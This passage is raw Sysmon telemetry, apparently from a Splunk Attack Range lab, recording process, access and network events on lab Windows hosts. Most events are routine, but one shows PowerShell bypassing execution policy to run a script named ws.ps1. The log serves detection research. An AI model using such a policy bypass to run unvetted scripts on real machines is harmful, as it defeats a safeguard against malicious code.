Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808496Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.338{0C1E0330-F5E6-60EB-9979-00000000D001}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808495Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.306{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11B4AEE42052739F5C38A98205630379,SHA256=E6EE711B0A1D0434D4097E7D6EA5575BA24D85DE79455349ED55D75FE5F7E8DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.871{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=AE4455F4A85756CD28D57F5D7E8A8F3A,SHA256=519C041305F4BC73B0F2D9EAF1D9219F037CE384281820F19EDBA1FBE830EF30,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.859{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\ws.ps1.lnk2021-07-12 07:57:26.859 354300x80000000000000001051061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:18.374{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57446- 10341000x80000000000000001051060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.850{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.850{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.844{466BC892-F5E6-60EB-827D-00000000CF01}97248732C:\Windows\system32\conhost.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.832{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.826{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.826{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.825{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.825{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.824{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.824{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001051050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.798{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\ws.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001051090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:27.896{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B56434E4FF92606EAC4500CBB38258C2,SHA256=029814D8516658C67C926482D965599C22FE2875F22E6A35530A3F45C200944C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808539Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:25.251{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57332-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000808538Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.853{0C1E0330-F5E7-60EB-9B79-00000000D001}14883632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808537Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E7-60EB-9B79-00000000D001}1488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808536Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808535Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808534Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808533Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808532Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808531Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808530Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808529Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808528Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808527Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F5E7-60EB-9B79-00000000D001}1488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808526Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.712{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E7-60EB-9B79-00000000D001}1488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808525Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:27.697{0C1E0330-F5E7-60EB-9B79-00000000D001}1488C:\Program 